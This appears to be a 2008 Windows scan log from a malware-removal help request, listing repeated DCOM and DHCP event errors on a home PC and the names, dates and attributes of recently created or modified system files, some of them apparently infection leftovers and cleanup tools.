System - Error - 8/19/2008 1:19:40 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:41 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:42 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:43 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:44 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:45 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:46 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:47 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:48 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:49 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:50 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:51 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:52 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:53 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:54 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:55 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:56 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:57 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:58 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:19:59 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:00 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:01 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:02 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:03 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:04 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:05 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:06 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:07 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:08 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:09 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:10 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:11 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:12 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:13 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:14 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:15 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:16 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:17 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:18 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:19 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:20 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:21 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:22 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:23 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:24 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:25 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:26 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:27 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:28 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:29 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:30 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:31 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:32 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:33 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:34 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:35 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:36 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:37 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:38 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:39 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:40 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:41 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:42 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:43 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:44 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:45 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:46 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:47 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:48 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:49 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:50 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:51 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:52 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:53 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:54 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:55 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:56 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:57 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:58 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:20:59 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:00 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:01 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:02 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:03 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:04 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:05 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:06 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:07 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:08 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:09 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:10 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:11 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:12 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:13 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:14 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:15 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:16 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:17 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:18 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:19 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:20 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:21 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:22 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:23 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 1:21:24 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 4:40:27 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 4:44:09 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/19/2008 4:44:23 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Warning - 8/20/2008 8:12:27 AM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Tcpip -> Description = 
System - Warning - 8/20/2008 9:38:31 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 001D09963004  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/20/2008 9:38:31 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216824 on theNetwork Card with network address 001D09963004
System - Warning - 8/22/2008 7:02:25 AM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 001D09963004  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/22/2008 7:02:25 AM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216824 on theNetwork Card with network address 001D09963004
System - Warning - 8/22/2008 1:08:36 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 001D09963004  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/22/2008 1:08:36 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216824 on theNetwork Card with network address 001D09963004
System - Warning - 8/22/2008 1:38:34 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 001D09963004  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/22/2008 1:38:34 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216824 on theNetwork Card with network address 001D09963004
System - Error - 8/22/2008 1:38:57 PM -> Computer Name = D81YX6G1 - User Name = NT AUTHORITY\SYSTEM - Source = DCOM -> Description = 
System - Error - 8/22/2008 1:40:18 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Service Control Manager -> Description = The Trend Micro Proxy Service service depends on the Trend Micro TDI Driver service which failed to start because of the following error 31
System - Error - 8/22/2008 1:40:18 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Service Control Manager -> Description = The following boot-start or system-start driver(s) failed to load Fipsintelppmtmtdi
System - Warning - 8/22/2008 2:52:41 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 001D09963004  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/22/2008 2:52:41 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216824 on theNetwork Card with network address 001D09963004
System - Warning - 8/22/2008 2:54:54 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 001D09963004  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/22/2008 2:54:54 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216824 on theNetwork Card with network address 001D09963004
System - Error - 8/22/2008 2:55:21 PM -> Computer Name = D81YX6G1 - User Name = NT AUTHORITY\SYSTEM - Source = DCOM -> Description = 
System - Error - 8/22/2008 2:55:44 PM -> Computer Name = D81YX6G1 - User Name = D81YX6G1\Tom - Source = DCOM -> Description = 
System - Error - 8/22/2008 2:56:39 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Service Control Manager -> Description = The Trend Micro Proxy Service service depends on the Trend Micro TDI Driver service which failed to start because of the following error 31
System - Error - 8/22/2008 2:56:39 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Service Control Manager -> Description = The following boot-start or system-start driver(s) failed to load Fipsintelppmtmtdi
System - Warning - 8/22/2008 5:46:24 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 001D09963004  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/22/2008 5:46:24 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216824 on theNetwork Card with network address 001D09963004
System - Error - 8/22/2008 5:46:47 PM -> Computer Name = D81YX6G1 - User Name = NT AUTHORITY\SYSTEM - Source = DCOM -> Description = 
System - Error - 8/22/2008 5:48:09 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Service Control Manager -> Description = The Trend Micro Proxy Service service depends on the Trend Micro TDI Driver service which failed to start because of the following error 31
System - Error - 8/22/2008 5:48:09 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Service Control Manager -> Description = The following boot-start or system-start driver(s) failed to load Fipsintelppmtmtdi
System - Error - 8/22/2008 5:51:01 PM -> Computer Name = D81YX6G1 - User Name = NT AUTHORITY\SYSTEM - Source = DCOM -> Description = 
System - Warning - 8/22/2008 5:51:42 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 001D09963004  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/22/2008 5:51:42 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216824 on theNetwork Card with network address 001D09963004
System - Warning - 8/22/2008 6:00:47 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 001D09963004  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/22/2008 6:00:47 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216824 on theNetwork Card with network address 001D09963004
System - Warning - 8/23/2008 6:57:00 AM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 001D09963004  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/23/2008 6:57:00 AM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216824 on theNetwork Card with network address 001D09963004
System - Warning - 8/23/2008 10:40:58 AM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 001D09963004  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/23/2008 10:40:58 AM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216824 on theNetwork Card with network address 001D09963004
System - Warning - 8/23/2008 4:07:37 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 001D09963004  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/23/2008 4:07:37 PM -> Computer Name = D81YX6G1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216824 on theNetwork Card with network address 001D09963004


[Files/Folders - Created Within 30 days]
autorun.inf -> %SystemDrive%\autorun.inf ->  [Folder | Created Date = 8/24/2008 9:33:31 AM | Attr = RHS]
FIXTOOL -> %SystemDrive%\FIXTOOL ->  [Folder | Created Date = 8/21/2008 5:59:08 PM | Attr =    ]
hiberfil.sys -> %SystemDrive%\hiberfil.sys ->  [Ver =  | Size = 2136129536 bytes | Created Date = 8/22/2008 6:51:38 PM | Attr =  HS]
Radz_Services.vbs -> %SystemDrive%\Radz_Services.vbs ->  [Ver =  | Size = 5830 bytes | Created Date = 8/20/2008 7:22:13 AM | Attr =    ]
remover.bat -> %SystemDrive%\remover.bat ->  [Ver =  | Size = 204 bytes | Created Date = 8/23/2008 12:47:04 AM | Attr =    ]
@Alternate Data Stream - 26 bytes -> %SystemDrive%\remover.bat:Zone.Identifier
sowar.vbs -> %SystemDrive%\sowar.vbs ->  [Ver =  | Size = 5830 bytes | Created Date = 8/20/2008 7:22:13 AM | Attr = RHS]
tmtdi.sys -> %SystemRoot%\System32\drivers\tmtdi.sys -> Trend Micro Inc. [Ver = 2.1.0.1050 built by: WinDDK | Size = 73288 bytes | Created Date = 8/19/2008 6:02:29 PM | Attr =    ]
404Fix.exe -> %SystemRoot%\System32\404Fix.exe -> S!Ri.URZ [Ver =  | Size = 82432 bytes | Created Date = 8/22/2008 6:39:09 PM | Attr =    ]
AntiXPVSTFix.exe -> %SystemRoot%\System32\AntiXPVSTFix.exe -> S!Ri.URZ [Ver =  | Size = 87552 bytes | Created Date = 8/22/2008 6:39:09 PM | Attr =    ]
dumphive.exe -> %SystemRoot%\System32\dumphive.exe ->  [Ver =  | Size = 51200 bytes | Created Date = 8/22/2008 6:39:09 PM | Attr =    ]
IEDFix.C.exe -> %SystemRoot%\System32\IEDFix.C.exe -> S!Ri.URZ [Ver =  | Size = 82432 bytes | Created Date = 8/22/2008 6:39:09 PM | Attr =    ]
IEDFix.exe -> %SystemRoot%\System32\IEDFix.exe -> S!Ri.URZ [Ver =  | Size = 82944 bytes | Created Date = 8/22/2008 6:39:09 PM | Attr =    ]
Process.exe -> %SystemRoot%\System32\Process.exe -> http://www.beyondlogic.org [Ver = 2, 0, 0, 0 | Size = 53248 bytes | Created Date = 8/22/2008 6:39:08 PM | Attr =    ]
SrchSTS.exe -> %SystemRoot%\System32\SrchSTS.exe -> S!Ri [Ver =  | Size = 288417 bytes | Created Date = 8/22/2008 6:39:09 PM | Attr =    ]
swreg.exe -> %SystemRoot%\System32\swreg.exe -> SteelWerX [Ver = 2.0.1.0 | Size = 135168 bytes | Created Date = 8/22/2008 6:39:08 PM | Attr =    ]
swsc.exe -> %SystemRoot%\System32\swsc.exe ->  [Ver =  | Size = 40960 bytes | Created Date = 8/22/2008 6:39:09 PM | Attr =    ]
swxcacls.exe -> %SystemRoot%\System32\swxcacls.exe ->  [Ver =  | Size = 79360 bytes | Created Date = 8/22/2008 6:46:45 PM | Attr =    ]
tmp.reg -> %SystemRoot%\System32\tmp.reg ->  [Ver =  | Size = 2904 bytes | Created Date = 8/22/2008 6:40:08 PM | Attr =    ]
VACFix.exe -> %SystemRoot%\System32\VACFix.exe -> S!Ri.URZ [Ver =  | Size = 86528 bytes | Created Date = 8/22/2008 6:39:09 PM | Attr =    ]
VCCLSID.exe -> %SystemRoot%\System32\VCCLSID.exe -> S!Ri [Ver =  | Size = 289144 bytes | Created Date = 8/22/2008 6:39:09 PM | Attr =    ]
WS2Fix.exe -> %SystemRoot%\System32\WS2Fix.exe ->  [Ver =  | Size = 25600 bytes | Created Date = 8/22/2008 6:39:09 PM | Attr =    ]
QTFont.for -> %SystemRoot%\QTFont.for ->  [Ver =  | Size = 1409 bytes | Created Date = 8/22/2008 6:12:04 PM | Attr =    ]
QTFont.qfn -> %SystemRoot%\QTFont.qfn ->  [Ver =  | Size = 54156 bytes | Created Date = 8/22/2008 6:12:04 PM | Attr =  H ]
SysRes.vbs -> %SystemRoot%\SysRes.vbs ->  [Ver =  | Size = 0 bytes | Created Date = 8/24/2008 9:25:04 AM | Attr =    ]

[Files/Folders - Modified Within 30 days]
autorun.inf -> %SystemDrive%\autorun.inf ->  [Folder | Modified Date = 8/24/2008 9:33:31 AM | Attr = RHS]
FIXTOOL -> %SystemDrive%\FIXTOOL ->  [Folder | Modified Date = 8/21/2008 6:08:11 PM | Attr =    ]
hiberfil.sys -> %SystemDrive%\hiberfil.sys ->  [Ver =  | Size = 2136129536 bytes | Modified Date = 8/24/2008 8:17:17 AM | Attr =  HS]
process.exe -> %SystemDrive%\process.exe -> http://www.beyondlogic.org [Ver = 2, 0, 0, 0 | Size = 53248 bytes | Modified Date = 8/22/2008 3:56:04 PM | Attr =    ]
@Alternate Data Stream - 26 bytes -> %SystemDrive%\process.exe:Zone.Identifier
Program Files -> %ProgramFiles% ->  [Folder | Modified Date = 8/20/2008 8:28:13 AM | Attr = R  ]
remover.bat -> %SystemDrive%\remover.bat ->  [Ver =  | Size = 204 bytes | Modified Date = 8/22/2008 3:56:04 PM | Attr =    ]
@Alternate Data Stream - 26 bytes -> %SystemDrive%\remover.bat:Zone.Identifier
System Volume Information -> %SystemDrive%\System Volume Information ->  [Folder | Modified Date = 8/21/2008 6:13:42 PM | Attr =  HS]
WINDOWS -> %SystemRoot% ->  [Folder | Modified Date = 8/24/2008 9:25:04 AM | Attr =    ]
etc -> %SystemRoot%\System32\drivers\etc ->  [Folder | Modified Date = 8/23/2008 1:48:04 PM | Attr =    ]
hosts -> %SystemRoot%\System32\drivers\etc\hosts ->  [Ver =  | Size = 734 bytes | Modified Date = 8/22/2008 6:47:17 PM | Attr =    ]
404Fix.exe -> %SystemRoot%\System32\404Fix.exe -> S!Ri.URZ [Ver =  | Size = 82432 bytes | Modified Date = 8/18/2008 12:19:03 PM | Attr =    ]
8AF0241C4E.sys -> %SystemRoot%\System32\8AF0241C4E.sys ->  [Ver =  | Size = 104 bytes | Modified Date = 8/22/2008 6:09:18 PM | Attr = RHS]
AntiXPVSTFix.exe -> %SystemRoot%\System32\AntiXPVSTFix.exe -> S!Ri.URZ [Ver =  | Size = 87552 bytes | Modified Date = 8/21/2008 11:41:01 PM | Attr =    ]
CatRoot2 -> %SystemRoot%\System32\CatRoot2 ->  [Folder | Modified Date = 8/19/2008 6:02:31 PM | Attr =    ]
1 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp -> 
dllcache -> %SystemRoot%\System32\dllcache ->  [Folder | Modified Date = 8/12/2008 10:04:11 PM | Attr =  HS]
drivers -> %SystemRoot%\System32\drivers ->  [Folder | Modified Date = 8/23/2008 2:01:25 PM | Attr =    ]
IEDFix.C.exe -> %SystemRoot%\System32\IEDFix.C.exe -> S!Ri.URZ [Ver =  | Size = 82432 bytes | Modified Date = 8/14/2008 9:52:23 PM | Attr =    ]
KGyGaAvL.sys -> %SystemRoot%\System32\KGyGaAvL.sys ->  [Ver =  | Size = 5852 bytes | Modified Date = 8/22/2008 6:09:22 PM | Attr =  HS]
Restore -> %SystemRoot%\System32\Restore ->  [Folder | Modified Date = 8/21/2008 6:13:42 PM | Attr =    ]
tmp.reg -> %SystemRoot%\System32\tmp.reg ->  [Ver =  | Size = 2904 bytes | Modified Date = 8/22/2008 6:47:20 PM | Attr =    ]
